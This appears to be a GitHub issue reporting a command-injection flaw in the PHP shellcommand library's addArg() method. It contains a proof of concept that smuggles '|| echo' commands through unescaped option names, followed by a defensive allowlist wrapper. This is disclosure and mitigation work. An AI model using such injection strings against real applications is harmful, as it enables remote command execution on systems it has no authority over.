Closed
Description
I expect that addArg() escapes all arguments, preventing the possibility of command injection from untrusted sources, because in the README.md I see:
- Handle argument escaping
- `$escapeArgs`: Whether to escape any argument passed through `addArg()`. Default is `true`.
But that is not actually what happens.
PoC:

```php
<?php
require_once 'vendor/autoload.php';

use mikehaertl\shellcommand\Command;

$command = new Command(array(
    'command'    => 'curl',
    'escapeArgs' => true,
));
// In this example "escapeArgs" is set to "true", but no escaping happens.
$command->addArg('http://example.com --wrong-argument || echo "RCE 1"');
$command->execute();
echo $command->getOutput(); // RCE 1

$command = new Command(array(
    'command'    => 'curl http://example.com',
    'escapeArgs' => true,
));
$command->addArg('http://example.com');
// In this example, the second argument will be escaped properly, but the first one is not.
$command->addArg('--header foo --wrong-argument || echo "RCE 2" ||', 'bar');
$command->execute();
echo $command->getOutput(); // RCE 2
```
Disclaimer
This thread was initially started as a private email conversation. @mikehaertl asked me to open an issue here.
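The report above shows that `addArg()` escapes the value but passes the first parameter (the option name) through as-is. As an added example, not part of the issue or of the library, the wrapper below refuses any option name that is not a plain `-x`/`--name` token before it reaches `addArg()`, so untrusted text can only ever land in the escaped value slot. The allowlist regex and the helper names `assertSafeOptionName`/`addCheckedArg` are assumptions of this example.

```php
<?php
// Added example (not from the issue or the library): validate option names
// before they reach addArg(), since addArg() escapes only the value.
require_once 'vendor/autoload.php';

use mikehaertl\shellcommand\Command;

/**
 * Accept only plain option names such as "-o" or "--header" (assumed
 * allowlist). Anything containing spaces, quotes or shell metacharacters
 * is rejected outright rather than escaped, because the option name is
 * interpolated into the command line unescaped.
 */
function assertSafeOptionName($name)
{
    if (!preg_match('/^--?[A-Za-z0-9][A-Za-z0-9_-]*$/', $name)) {
        throw new InvalidArgumentException("Refusing unsafe option name: $name");
    }
}

/** Hypothetical helper: checked option name, library-escaped value. */
function addCheckedArg(Command $command, $name, $value = null)
{
    assertSafeOptionName($name);
    // The value still goes through the library's own escaping (escapeArgs=true).
    return $command->addArg($name, $value);
}

$command = new Command(array(
    'command'    => 'curl',
    'escapeArgs' => true,
));

// Untrusted data such as a URL belongs in the escaped value slot, behind a
// fixed, trusted option name.
addCheckedArg($command, '--url', 'http://example.com');
addCheckedArg($command, '--header', 'X-Foo: bar');

// Attacker-controlled text supplied as the option *name* (the pattern from
// the PoC) is rejected before anything is executed.
try {
    addCheckedArg($command, '--header foo || echo injected', 'bar');
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```

Until the library escapes the key itself, treating the first parameter of `addArg()` as trusted, constant text is the safe assumption.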